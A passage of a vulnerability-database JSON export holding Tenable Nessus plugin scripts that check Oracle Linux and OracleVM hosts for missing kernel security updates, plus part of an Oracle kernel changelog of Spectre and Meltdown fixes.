script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.19.12.el6uek\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.19.12.el7uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-10044\", \"CVE-2017-1000363\", \"CVE-2017-1000380\", \"CVE-2017-10661\", \"CVE-2017-11473\", \"CVE-2017-14489\", \"CVE-2017-2671\", \"CVE-2017-8831\", \"CVE-2017-9075\", \"CVE-2017-9077\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2017-3636\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"3.8\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.19.12.el6uek-0.4.5-3.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.19.12.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.19.12.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", 
reference:\"kernel-uek-debug-devel-3.8.13-118.19.12.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-118.19.12.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.19.12.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.19.12.el6uek\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.19.12.el7uek-0.4.5-3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.19.12.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.19.12.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.19.12.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-118.19.12.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.19.12.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.19.12.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:42:38", "bulletinFamily": "scanner", "description": "Description of changes:\n\n[2.6.39-400.297.6.el6uek]\n- l2tp: fix racy SOCK_ZAPPED flag check in l2tp_ip{,6}_bind() (Guillaume \nNault) [Orabug: 26586050] {CVE-2016-10200}\n- xfs: fix two memory leaks in xfs_attr_list.c error paths (Mateusz \nGuzik) [Orabug: 26586024] {CVE-2016-9685}\n- KEYS: Disallow keyrings beginning with ", "modified": "2019-12-02T00:00:00", "id": "ORACLELINUX_ELSA-2017-3607.NASL", "href": "https://www.tenable.com/plugins/nessus/102624", "published": "2017-08-21T00:00:00", "title": "Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2017-3607)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2017-3607.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102624);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2019/09/27 13:00:38\");\n\n script_cve_id(\"CVE-2016-10200\", \"CVE-2016-9604\", \"CVE-2016-9685\", \"CVE-2017-9242\");\n\n script_name(english:\"Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2017-3607)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[2.6.39-400.297.6.el6uek]\n- l2tp: fix racy SOCK_ZAPPED flag check in l2tp_ip{,6}_bind() (Guillaume \nNault) [Orabug: 26586050] {CVE-2016-10200}\n- xfs: fix two memory leaks in xfs_attr_list.c error paths (Mateusz \nGuzik) [Orabug: 26586024] {CVE-2016-9685}\n- KEYS: Disallow keyrings beginning with '.' 
to be joined as session \nkeyrings (David Howells) [Orabug: 26586002] {CVE-2016-9604}\n- ipv6: fix out of bound writes in __ip6_append_data() (Eric Dumazet) \n[Orabug: 26578202] {CVE-2017-9242}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-August/007145.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-10200\", \"CVE-2016-9604\", \"CVE-2016-9685\", \"CVE-2017-9242\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2017-3607\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-2.6.39-400.297.6.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-2.6.39-400.297.6.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-devel-2.6.39-400.297.6.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-devel-2.6.39-400.297.6.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-doc-2.6.39-400.297.6.el6uek\")) flag++;\nif 
(rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-firmware-2.6.39-400.297.6.el6uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:50:13", "bulletinFamily": "scanner", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - l2tp: fix racy SOCK_ZAPPED flag check in\n l2tp_ip[,6]_bind (Guillaume Nault) [Orabug: 26586047]\n (CVE-2016-10200)\n\n - xfs: fix two memory leaks in xfs_attr_list.c error paths\n (Mateusz Guzik) [Orabug: 26586022] (CVE-2016-9685)\n\n - KEYS: Disallow keyrings beginning with ", "modified": "2019-12-02T00:00:00", "id": "ORACLEVM_OVMSA-2017-0144.NASL", "href": "https://www.tenable.com/plugins/nessus/102625", "published": "2017-08-21T00:00:00", "title": "OracleVM 3.3 : Unbreakable / etc (OVMSA-2017-0144)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0144.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102625);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/09/27 13:00:35\");\n\n script_cve_id(\"CVE-2016-10200\", \"CVE-2016-9604\", \"CVE-2016-9685\", \"CVE-2017-9242\");\n\n script_name(english:\"OracleVM 3.3 : Unbreakable / etc (OVMSA-2017-0144)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n 
attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - l2tp: fix racy SOCK_ZAPPED flag check in\n l2tp_ip[,6]_bind (Guillaume Nault) [Orabug: 26586047]\n (CVE-2016-10200)\n\n - xfs: fix two memory leaks in xfs_attr_list.c error paths\n (Mateusz Guzik) [Orabug: 26586022] (CVE-2016-9685)\n\n - KEYS: Disallow keyrings beginning with '.' to be joined\n as session keyrings (David Howells) [Orabug: 26585994]\n (CVE-2016-9604)\n\n - ipv6: fix out of bound writes in __ip6_append_data (Eric\n Dumazet) [Orabug: 26578198] (CVE-2017-9242)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-August/000758.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ab2271dc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/21\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"kernel-uek-3.8.13-118.19.4.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"kernel-uek-firmware-3.8.13-118.19.4.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:57", "bulletinFamily": "unix", "description": "[4.1.12-61.63.1]\n- 
Revert 'kernel.spec: Require the new microcode_ctl.' (Brian Maly) \n- x86: Clean up IBRS functionality resident in common code (Kanth Ghatraju) [Orabug: 27439198] \n- x86: Display correct settings for the SPECTRE_V2 bug (Kanth Ghatraju) [Orabug: 27439198] \n- Set CONFIG_GENERIC_CPU_VULNERABILITIES flag (Kanth Ghatraju) [Orabug: 27439198] \n- x86/cpu: Implement CPU vulnerabilites sysfs functions (Thomas Gleixner) [Orabug: 27439198] \n- sysfs/cpu: Fix typos in vulnerability documentation (David Woodhouse) [Orabug: 27439198] \n- sysfs/cpu: Add vulnerability folder (Thomas Gleixner) [Orabug: 27439198] \n- x86/cpufeatures: Add X86_BUG_SPECTRE_V[12] (David Woodhouse) [Orabug: 27439198] \n- x86/cpufeatures: Add X86_BUG_CPU_MELTDOWN (Kanth Ghatraju) [Orabug: 27439198] \n- KVM: x86: Add memory barrier on vmcs field lookup (Andrew Honig) {CVE-2017-5753}\n- KVM: VMX: remove I/O port 0x80 bypass on Intel hosts (Andrew Honig) [Orabug: 27439182] {CVE-2017-1000407} {CVE-2017-1000407}\n[4.1.12-61.62.1]\n- xen-blkback: add pending_req allocation stats (Ankur Arora) [Orabug: 27386891] \n- xen-blkback: move indirect req allocation out-of-line (Ankur Arora) [Orabug: 27386891] \n- xen-blkback: pull nseg validation out in a function (Ankur Arora) [Orabug: 27386891] \n- xen-blkback: make struct pending_req less monolithic (Ankur Arora) [Orabug: 27386891]\n[4.1.12-61.61.1]\n- x86/pti/efi: broken conversion from efi to kernel page table (Pavel Tatashin) [Orabug: 27378519] [Orabug: 27352353] {CVE-2017-5754}\n- x86/spec: Always set IBRS to guest value on VMENTER and host on VMEXIT (redux) (Konrad Rzeszutek Wilk) [Orabug: 27378474] \n- x86/IBRS: Make sure we restore MSR_IA32_SPEC_CTRL to a valid value (Boris Ostrovsky) [Orabug: 27378115] \n- x86/IBRS/IBPB: Set sysctl_ibrs/ibpb_enabled properly (Boris Ostrovsky) [Orabug: 27382622] \n- x86/spec_ctrl: Add missing 'lfence' when IBRS is not supported. 
(Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715}\n- x86/entry_64: TRACE_IRQS_OFF before re-enabling. (Jamie Iles) [Orabug: 27345850] {CVE-2017-5715}\n- ptrace: remove unlocked RCU dereference. (Jamie Iles) [Orabug: 27345850] {CVE-2017-5715}\n- x86/ia32: Adds code hygiene for 32bit SYSCALL instruction entry. (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715}\n- x86/ia32: dont save registers on audit call (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715}\n- x86/spec/ia32: Sprinkle IBRS and RSB at the 32-bit SYSCALL (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715}\n- x86/ia32: Move STUFF_RSB And ENABLE_IBRS (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715}\n- x86/spec: Always set IBRS to guest value on VMENTER and host on VMEXIT. (Konrad Rzeszutek Wilk) [Orabug: 27365614] {CVE-2017-5715}\n- x86/ia32: save and clear registers on syscall. (Jamie Iles) [Orabug: 27371760] {CVE-2017-5754}\n- x86/IBRS: Save current status of MSR_IA32_SPEC_CTRL (Boris Ostrovsky) [Orabug: 27371757] \n- pti: Rename X86_FEATURE_KAISER to X86_FEATURE_PTI (Pavel Tatashin) [Orabug: 27371653] {CVE-2017-5754}\n- x86/spec_ctrl: Add missing IBRS_DISABLE (Konrad Rzeszutek Wilk) \n- Make use of ibrs_inuse consistent. (Jun Nakajima) \n- x86/kvm: Set IBRS on VMEXIT if guest disabled it. (Konrad Rzeszutek Wilk) \n- Re-introduce clearing of r12-15, rbp, rbx (Kris Van Hees) [Orabug: 27345850] {CVE-2017-5715}\n- x86: more ibrs/pti fixes (Pavel Tatashin) [Orabug: 27371653] {CVE-2017-5754}\n- x86/spec: Actually do the check for in_use on ENABLE_IBRS (Konrad Rzeszutek Wilk) {CVE-2017-5715}\n- kvm: svm: Expose the CPUID.0x80000008 ebx flag. (Konrad Rzeszutek Wilk) {CVE-2017-5715}\n- x86/spec_ctrl: Provide the sysfs version of the ibrs_enabled (Konrad Rzeszutek Wilk) {CVE-2017-5715}\n- x86: Use better #define for FEATURE_ENABLE_IBRS and 0 (Konrad Rzeszutek Wilk) {CVE-2017-5715}\n- x86: Instead of 0x2, 0x4, and 0x1 use #defines. 
(Konrad Rzeszutek Wilk) {CVE-2017-5715}\n- kpti: Disable when running under Xen PV (Konrad Rzeszutek Wilk) [Orabug: 27371653] {CVE-2017-5754}\n- x86: Dont ENABLE_IBRS in nmi when we are still running on user cr3 (Konrad Rzeszutek Wilk) {CVE-2017-5715}\n- x86/enter: Use IBRS on syscall and interrupts - fix ia32 path (Konrad Rzeszutek Wilk) {CVE-2017-5715}\n- x86: Fix spectre/kpti integration (Konrad Rzeszutek Wilk) [Orabug: 27371653] {CVE-2017-5754}\n- PTI: unbreak EFI old_memmap (Jiri Kosina) [Orabug: 27371653] {CVE-2017-5754}\n- KAISER KABI tweaks. (Martin K. Petersen) [Orabug: 27371653] {CVE-2017-5754}\n- x86/ldt: fix crash in ldt freeing. (Jamie Iles) [Orabug: 27371653] {CVE-2017-5754}\n- x86/entry: Define 'cpu_current_top_of_stack' for 64-bit code (Denys Vlasenko) [Orabug: 27371653] {CVE-2017-5754}\n- x86/entry: Remove unused 'kernel_stack' per-cpu variable (Denys Vlasenko) [Orabug: 27371653] {CVE-2017-5754}\n- x86/entry: Stop using PER_CPU_VAR(kernel_stack) (Denys Vlasenko) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: Set _PAGE_NX only if supported (Guenter Roeck) [Orabug: 27371653] {CVE-2017-5754}\n- x86/vdso: Get pvclock data from the vvar VMA instead of the fixmap (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- KPTI: Report when enabled (Kees Cook) [Orabug: 27371653] {CVE-2017-5754}\n- KPTI: Rename to PAGE_TABLE_ISOLATION (Kees Cook) [Orabug: 27371653] {CVE-2017-5754}\n- x86/kaiser: Move feature detection up (Borislav Petkov) [Orabug: 27371653] {CVE-2017-5754}\n- x86/kaiser: Reenable PARAVIRT (Borislav Petkov) [Orabug: 27371653] {CVE-2017-5754}\n- x86/paravirt: Dont patch flush_tlb_single (Thomas Gleixner) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: kaiser_flush_tlb_on_return_to_user() check PCID (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: asm/tlbflush.h handle noPGE at lower level (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: drop is_atomic arg to kaiser_pagetable_walk() (Hugh Dickins) [Orabug: 27371653] 
{CVE-2017-5754}\n- kaiser: use ALTERNATIVE instead of x86_cr3_pcid_noflush (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- x86/kaiser: Check boottime cmdline params (Borislav Petkov) [Orabug: 27371653] {CVE-2017-5754}\n- x86/kaiser: Rename and simplify X86_FEATURE_KAISER handling (Borislav Petkov) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: add 'nokaiser' boot option, using ALTERNATIVE (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: fix unlikely error in alloc_ldt_struct() (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: _pgd_alloc() without __GFP_REPEAT to avoid stalls (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: paranoid_entry pass cr3 need to paranoid_exit (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: x86_cr3_pcid_noflush and x86_cr3_pcid_user (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: PCID 0 for kernel and 128 for user (Hugh Dickins) [Orabug: 27371653] 